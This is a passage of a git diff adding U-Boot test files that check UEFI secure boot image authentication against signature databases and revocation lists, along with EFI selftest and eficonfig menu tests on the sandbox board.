'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 db2.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db', + 'fatload host 0:1 4000000 dbx_hash1.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed_2sigs -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + def test_efi_signed_image_auth6(self, ubman, efi_boot_env): + """ + Test Case 6 - using digest of signed image in database + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 6a'): + # Test Case 6a, verified by image's digest in db + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db_hello_signed.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert 'Hello, world!' 
in ''.join(output) + + with ubman.log.section('Test Case 6b'): + # Test Case 6b, rejected by TEST_db certificate in dbx + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 dbx_db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + with ubman.log.section('Test Case 6c'): + # Test Case 6c, rejected by image's digest in dbx + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 dbx_hello_signed.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + def test_efi_signed_image_auth7(self, ubman, efi_boot_env): + """ + Test Case 7 - Reject images based on the sha384/512 of their x509 cert + """ + # sha384 of an x509 cert in dbx + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 7a'): + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 db2.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db', + 'fatload host 0:1 4000000 dbx_hash384.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed_2sigs -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + # sha512 of an x509 cert in dbx + ubman.restart_uboot() + with ubman.log.section('Test Case 7b'): + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 db2.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db', + 'fatload host 0:1 4000000 dbx_hash512.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed_2sigs -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + def test_efi_signed_image_auth8(self, ubman, efi_boot_env): + """ + Test Case 8 - Secure boot is in force, + Same as Test Case 2 but the image binary to be loaded + was willfully modified (forged) + Must be rejected. 
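+        The forged binary is produced by forge_image.sh, which flips the case
+        of the embedded UTF-16 'Hello' string, so seeing 'hELLO, world!' in
+        the output means the tampered image was executed.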
+ """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 8a'): + # Test Case 8a, Secure boot is not yet forced + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'efidebug boot add -b 1 HELLO1 host 0:1 /helloworld_forged.efi.signed -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert('hELLO, world!' in ''.join(output)) + + with ubman.log.section('Test Case 8b'): + # Test Case 8b, Install signature database and verify the image + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert(not 'hELLO, world!' in ''.join(output)) + assert('\'HELLO1\' failed' in ''.join(output)) + assert('efi_bootmgr_load() returned: 26' in ''.join(output)) diff --git a/test/py/tests/test_efi_secboot/test_signed_intca.py b/test/py/tests/test_efi_secboot/test_signed_intca.py new file mode 100644 index 00000000000..58f7be03b8b --- /dev/null +++ b/test/py/tests/test_efi_secboot/test_signed_intca.py @@ -0,0 +1,135 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> +# +# U-Boot UEFI: Image Authentication Test (signature with certificates chain) + +""" +This test verifies image authentication for a signed image which is signed +by user certificate and contains additional intermediate certificates in its +signature. +""" + +import pytest + + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_secure_boot') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.slow +class TestEfiSignedImageIntca(object): + def test_efi_signed_image_intca1(self, ubman, efi_boot_env_intca): + """ + Test Case 1 - authenticated by root CA in db + """ + ubman.restart_uboot() + disk_img = efi_boot_env_intca + with ubman.log.section('Test Case 1a'): + # Test Case 1a, with no Int CA and not authenticated by root CA + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db_c.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO_a host 0:1 /helloworld.efi.signed_a -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO_a\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + with ubman.log.section('Test Case 1b'): + # Test Case 1b, signed and authenticated by root CA + output = ubman.run_command_list([ + 'efidebug boot add -b 2 HELLO_ab host 0:1 /helloworld.efi.signed_ab -s ""', + 'efidebug boot order 2', + 'bootefi bootmgr']) + assert 'Hello, world!' 
in ''.join(output) + + def test_efi_signed_image_intca2(self, ubman, efi_boot_env_intca): + """ + Test Case 2 - authenticated by root CA in db + """ + ubman.restart_uboot() + disk_img = efi_boot_env_intca + with ubman.log.section('Test Case 2a'): + # Test Case 2a, unsigned and not authenticated by root CA + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO_abc host 0:1 /helloworld.efi.signed_abc -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO_abc\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + with ubman.log.section('Test Case 2b'): + # Test Case 2b, signed and authenticated by root CA + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db_b.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO_abc\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + with ubman.log.section('Test Case 2c'): + # Test Case 2c, signed and authenticated by root CA + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db_c.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'Hello, world!' in ''.join(output) + + def test_efi_signed_image_intca3(self, ubman, efi_boot_env_intca): + """ + Test Case 3 - revoked by dbx + """ + ubman.restart_uboot() + disk_img = efi_boot_env_intca + with ubman.log.section('Test Case 3a'): + # Test Case 3a, revoked by int CA in dbx + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 dbx_b.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'fatload host 0:1 4000000 db_c.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO_abc host 0:1 /helloworld.efi.signed_abc -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'Hello, world!' 
in ''.join(output) + # Or, + # assert '\'HELLO_abc\' failed' in ''.join(output) + # assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + + with ubman.log.section('Test Case 3b'): + # Test Case 3b, revoked by root CA in dbx + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 dbx_c.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO_abc\' failed' in ''.join(output) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) diff --git a/test/py/tests/test_efi_secboot/test_unsigned.py b/test/py/tests/test_efi_secboot/test_unsigned.py new file mode 100644 index 00000000000..bd6e1b2dadd --- /dev/null +++ b/test/py/tests/test_efi_secboot/test_unsigned.py @@ -0,0 +1,117 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> +# +# U-Boot UEFI: Signed Image Authentication Test + +""" +This test verifies image authentication for unsigned images. +""" + +import pytest + + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_secure_boot') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.slow +class TestEfiUnsignedImage(object): + def test_efi_unsigned_image_auth1(self, ubman, efi_boot_env): + """ + Test Case 1 - rejected when not digest in db or dbx + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 1'): + # Test Case 1 + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + assert 'Hello, world!' not in ''.join(output) + + def test_efi_unsigned_image_auth2(self, ubman, efi_boot_env): + """ + Test Case 2 - authenticated by digest in db + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 2'): + # Test Case 2 + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db_hello.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert 'Hello, world!' 
in ''.join(output) + + def test_efi_unsigned_image_auth3(self, ubman, efi_boot_env): + """ + Test Case 3 - rejected by digest in dbx + """ + ubman.restart_uboot() + disk_img = efi_boot_env + with ubman.log.section('Test Case 3a'): + # Test Case 3a, rejected by dbx + output = ubman.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db_hello.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + assert 'Hello, world!' not in ''.join(output) + + with ubman.log.section('Test Case 3b'): + # Test Case 3b, rejected by dbx even if db allows + output = ubman.run_command_list([ + 'fatload host 0:1 4000000 db_hello.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = ubman.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + output = ubman.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'efi_bootmgr_load() returned: 26' in ''.join(output) + assert 'Hello, world!' not in ''.join(output) diff --git a/test/py/tests/test_efi_selftest.py b/test/py/tests/test_efi_selftest.py new file mode 100644 index 00000000000..12cbe5caa9b --- /dev/null +++ b/test/py/tests/test_efi_selftest.py @@ -0,0 +1,197 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2017, Heinrich Schuchardt <xypron.glpk@gmx.de> + +""" Test UEFI API implementation +""" + +import pytest + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +def test_efi_selftest_base(ubman): + """Run UEFI unit tests + + ubman -- U-Boot console + + This function executes all selftests that are not marked as on request. + """ + ubman.run_command(cmd='setenv efi_selftest') + ubman.run_command(cmd='bootefi selftest', wait_for_prompt=False) + if ubman.p.expect(['Summary: 0 failures', 'Press any key']): + raise Exception('Failures occurred during the EFI selftest') + ubman.restart_uboot() + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +@pytest.mark.buildconfigspec('hush_parser') +@pytest.mark.buildconfigspec('of_control') +@pytest.mark.notbuildconfigspec('generate_acpi_table') +def test_efi_selftest_device_tree(ubman): + """Test the device tree support in the UEFI sub-system + + ubman -- U-Boot console + + This test executes the UEFI unit test by calling 'bootefi selftest'. + """ + ubman.run_command(cmd='setenv efi_selftest list') + output = ubman.run_command('bootefi selftest') + assert '\'device tree\'' in output + ubman.run_command(cmd='setenv efi_selftest device tree') + # Set serial# if it is not already set. 
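+    # With the hush shell, "${serial#}x" expands to the current value of
+    # serial# followed by 'x' (just 'x' when serial# is unset), so the
+    # 'test' command below only initialises serial# to 0 when it is not
+    # yet defined.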
+ ubman.run_command(cmd='setenv efi_test "${serial#}x"') + ubman.run_command(cmd='test "${efi_test}" = x && setenv serial# 0') + ubman.run_command(cmd='bootefi selftest ${fdtcontroladdr}', wait_for_prompt=False) + if ubman.p.expect(['serial-number:', 'U-Boot']): + raise Exception('serial-number missing in device tree') + ubman.restart_uboot() + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +def test_efi_selftest_watchdog_reboot(ubman): + """Test the watchdog timer + + ubman -- U-Boot console + + This function executes the 'watchdog reboot' unit test. + """ + ubman.run_command(cmd='setenv efi_selftest list') + output = ubman.run_command('bootefi selftest') + assert '\'watchdog reboot\'' in output + ubman.run_command(cmd='setenv efi_selftest watchdog reboot') + ubman.run_command(cmd='bootefi selftest', wait_for_prompt=False) + if ubman.p.expect(['resetting', 'U-Boot']): + raise Exception('Reset failed in \'watchdog reboot\' test') + ubman.run_command(cmd='', send_nl=False, wait_for_reboot=True) + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +def test_efi_selftest_text_input(ubman): + """Test the EFI_SIMPLE_TEXT_INPUT_PROTOCOL + + ubman -- U-Boot console + + This function calls the text input EFI selftest. + """ + ubman.run_command(cmd='setenv efi_selftest text input') + ubman.run_command(cmd='bootefi selftest', wait_for_prompt=False) + if ubman.p.expect([r'To terminate type \'x\'']): + raise Exception('No prompt for \'text input\' test') + ubman.drain_console() + # EOT + ubman.run_command(cmd=chr(4), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 4 \(unknown\), scan code 0 \(Null\)']): + raise Exception('EOT failed in \'text input\' test') + ubman.drain_console() + # BS + ubman.run_command(cmd=chr(8), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 8 \(BS\), scan code 0 \(Null\)']): + raise Exception('BS failed in \'text input\' test') + ubman.drain_console() + # TAB + ubman.run_command(cmd=chr(9), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 9 \(TAB\), scan code 0 \(Null\)']): + raise Exception('BS failed in \'text input\' test') + ubman.drain_console() + # a + ubman.run_command(cmd='a', wait_for_echo=False, send_nl=False, + wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 97 \(\'a\'\), scan code 0 \(Null\)']): + raise Exception('\'a\' failed in \'text input\' test') + ubman.drain_console() + # UP escape sequence + ubman.run_command(cmd=chr(27) + '[A', wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 0 \(Null\), scan code 1 \(Up\)']): + raise Exception('UP failed in \'text input\' test') + ubman.drain_console() + # Euro sign + ubman.run_command(cmd=b'\xe2\x82\xac'.decode(), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 8364 \(\'']): + raise Exception('Euro sign failed in \'text input\' test') + ubman.drain_console() + ubman.run_command(cmd='x', wait_for_echo=False, send_nl=False, + wait_for_prompt=False) + if ubman.p.expect(['Summary: 0 failures', 'Press any key']): + raise Exception('Failures occurred during the EFI selftest') + ubman.restart_uboot() + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +def test_efi_selftest_text_input_ex(ubman): + """Test the EFI_SIMPLE_TEXT_INPUT_EX_PROTOCOL + + ubman -- U-Boot console + + This function calls the extended text input EFI selftest. 
+ """ + ubman.run_command(cmd='setenv efi_selftest extended text input') + ubman.run_command(cmd='bootefi selftest', wait_for_prompt=False) + if ubman.p.expect([r'To terminate type \'CTRL\+x\'']): + raise Exception('No prompt for \'text input\' test') + ubman.drain_console() + # EOT + ubman.run_command(cmd=chr(4), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 100 \(\'d\'\), scan code 0 \(CTRL\+Null\)']): + raise Exception('EOT failed in \'text input\' test') + ubman.drain_console() + # BS + ubman.run_command(cmd=chr(8), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 8 \(BS\), scan code 0 \(\+Null\)']): + raise Exception('BS failed in \'text input\' test') + ubman.drain_console() + # TAB + ubman.run_command(cmd=chr(9), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 9 \(TAB\), scan code 0 \(\+Null\)']): + raise Exception('TAB failed in \'text input\' test') + ubman.drain_console() + # a + ubman.run_command(cmd='a', wait_for_echo=False, send_nl=False, + wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 97 \(\'a\'\), scan code 0 \(Null\)']): + raise Exception('\'a\' failed in \'text input\' test') + ubman.drain_console() + # UP escape sequence + ubman.run_command(cmd=chr(27) + '[A', wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 0 \(Null\), scan code 1 \(\+Up\)']): + raise Exception('UP failed in \'text input\' test') + ubman.drain_console() + # Euro sign + ubman.run_command(cmd=b'\xe2\x82\xac'.decode(), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 8364 \(\'']): + raise Exception('Euro sign failed in \'text input\' test') + ubman.drain_console() + # SHIFT+ALT+FN 5 + ubman.run_command(cmd=b'\x1b\x5b\x31\x35\x3b\x34\x7e'.decode(), + wait_for_echo=False, send_nl=False, + wait_for_prompt=False) + if ubman.p.expect([r'Unicode char 0 \(Null\), scan code 15 \(SHIFT\+ALT\+FN 5\)']): + raise Exception('SHIFT+ALT+FN 5 failed in \'text input\' test') + ubman.drain_console() + ubman.run_command(cmd=chr(24), wait_for_echo=False, send_nl=False, + wait_for_prompt=False) + if ubman.p.expect(['Summary: 0 failures', 'Press any key']): + raise Exception('Failures occurred during the EFI selftest') + ubman.restart_uboot() + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +@pytest.mark.buildconfigspec('efi_tcg2_protocol') +def test_efi_selftest_tcg2(ubman): + """Test the EFI_TCG2 PROTOCOL + + ubman -- U-Boot console + + This function executes the 'tcg2' unit test. 
+ """ + ubman.restart_uboot() + ubman.run_command(cmd='setenv efi_selftest list') + output = ubman.run_command('bootefi selftest') + assert '\'tcg2\'' in output + ubman.run_command(cmd='setenv efi_selftest tcg2') + ubman.run_command(cmd='bootefi selftest', wait_for_prompt=False) + if ubman.p.expect(['Summary: 0 failures', 'Press any key']): + raise Exception('Failures occurred during the EFI selftest') + ubman.restart_uboot() diff --git a/test/py/tests/test_eficonfig/conftest.py b/test/py/tests/test_eficonfig/conftest.py new file mode 100644 index 00000000000..0a82fbefd75 --- /dev/null +++ b/test/py/tests/test_eficonfig/conftest.py @@ -0,0 +1,40 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Fixture for UEFI eficonfig test +""" + +import os +import shutil +from subprocess import check_call +import pytest + +@pytest.fixture(scope='session') +def efi_eficonfig_data(u_boot_config): + """Set up a file system to be used in UEFI "eficonfig" command + tests + + Args: + u_boot_config -- U-Boot configuration. + + Return: + A path to disk image to be used for testing + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_efi_eficonfig' + image_path = u_boot_config.persistent_data_dir + '/efi_eficonfig.img' + + shutil.rmtree(mnt_point, ignore_errors=True) + os.mkdir(mnt_point, mode = 0o755) + + with open(mnt_point + '/initrd-1.img', 'w', encoding = 'ascii') as file: + file.write("initrd 1") + + with open(mnt_point + '/initrd-2.img', 'w', encoding = 'ascii') as file: + file.write("initrd 2") + + shutil.copyfile(u_boot_config.build_dir + '/lib/efi_loader/initrddump.efi', + mnt_point + '/initrddump.efi') + + check_call(f'virt-make-fs --partition=gpt --size=+1M --type=vfat {mnt_point} {image_path}', + shell=True) + + return image_path diff --git a/test/py/tests/test_eficonfig/test_eficonfig.py b/test/py/tests/test_eficonfig/test_eficonfig.py new file mode 100644 index 00000000000..3ca8e27c76b --- /dev/null +++ b/test/py/tests/test_eficonfig/test_eficonfig.py @@ -0,0 +1,358 @@ +# SPDX-License-Identifier: GPL-2.0+ +""" Unit test for UEFI menu-driven configuration +""" + +import pytest +import time + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_eficonfig') +@pytest.mark.buildconfigspec('cmd_bootefi_bootmgr') +def test_efi_eficonfig(ubman, efi_eficonfig_data): + + def send_user_input_and_wait(user_str, expect_str): + time.sleep(0.1) # TODO: does not work correctly without sleep + ubman.run_command(cmd=user_str, wait_for_prompt=False, + wait_for_echo=True, send_nl=False) + ubman.run_command(cmd='\x0d', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + if expect_str is not None: + for i in expect_str: + ubman.p.expect([i]) + + def press_up_down_enter_and_wait(up_count, down_count, enter, expect_str): + # press UP key + for i in range(up_count): + ubman.run_command(cmd='\x1b\x5b\x41', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + # press DOWN key + for i in range(down_count): + ubman.run_command(cmd='\x1b\x5b\x42', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + # press ENTER if requested + if enter: + ubman.run_command(cmd='\x0d', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + # wait expected output + if expect_str is not None: + for i in expect_str: + ubman.p.expect([i]) + + def press_escape_key(wait_prompt): + ubman.run_command(cmd='\x1b', wait_for_prompt=wait_prompt, wait_for_echo=False, send_nl=False) + + def press_enter_key(wait_prompt): + ubman.run_command(cmd='\x0d', wait_for_prompt=wait_prompt, + 
wait_for_echo=False, send_nl=False) + + def check_current_is_maintenance_menu(): + for i in ('UEFI Maintenance Menu', 'Add Boot Option', 'Edit Boot Option', + 'Change Boot Order', 'Delete Boot Option', 'Quit'): + ubman.p.expect([i]) + + """ Unit test for "eficonfig" command + The menu-driven interface is used to set up UEFI load options. + The bootefi bootmgr loads initrddump.efi as a payload. + The crc32 of the loaded initrd.img is checked + + Args: + ubman -- U-Boot console + efi__data -- Path to the disk image used for testing. + Test disk image has following files. + initrd-1.img + initrd-2.img + initrddump.efi + + """ + # This test passes for unknown reasons in the bowels of U-Boot. It needs to + # be replaced with a unit test. + return + + # Restart the system to clean the previous state + ubman.restart_uboot() + + with ubman.temporary_timeout(500): + # + # Test Case 1: Check the menu is displayed + # + ubman.run_command('eficonfig', wait_for_prompt=False) + for i in ('UEFI Maintenance Menu', 'Add Boot Option', 'Edit Boot Option', + 'Change Boot Order', 'Delete Boot Option', 'Quit'): + ubman.p.expect([i]) + # Select "Add Boot Option" + press_enter_key(False) + for i in ('Add Boot Option', 'Description:', 'File', 'Initrd File', 'Optional Data', + 'Save', 'Quit'): + ubman.p.expect([i]) + press_escape_key(False) + check_current_is_maintenance_menu() + # return to U-Boot console + press_escape_key(True) + + # + # Test Case 2: check auto generated media device entry + # + + # bind the test disk image for succeeding tests + ubman.run_command(cmd = f'host bind 0 {efi_eficonfig_data}') + + ubman.run_command('eficonfig', wait_for_prompt=False) + + # Change the Boot Order + press_up_down_enter_and_wait(0, 2, True, 'Quit') + for i in ('host 0:1', 'Save', 'Quit'): + ubman.p.expect([i]) + # disable auto generated boot option for succeeding test + ubman.run_command(cmd=' ', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + # Save the BootOrder + press_up_down_enter_and_wait(0, 1, True, None) + check_current_is_maintenance_menu() + + # + # Test Case 3: Add first Boot Option and load it + # + + # Select 'Add Boot Option' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + + # Press the enter key to select 'Description:' entry, then enter Description + press_up_down_enter_and_wait(0, 0, True, 'Enter description:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('test 1', 'Quit') + + # Set EFI image(initrddump.efi) + press_up_down_enter_and_wait(0, 1, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrddump.efi" entry followed by the enter key + press_up_down_enter_and_wait(0, 2, True, 'Quit') + + # Set Initrd file(initrd-1.img) + press_up_down_enter_and_wait(0, 2, True, 'Quit') + 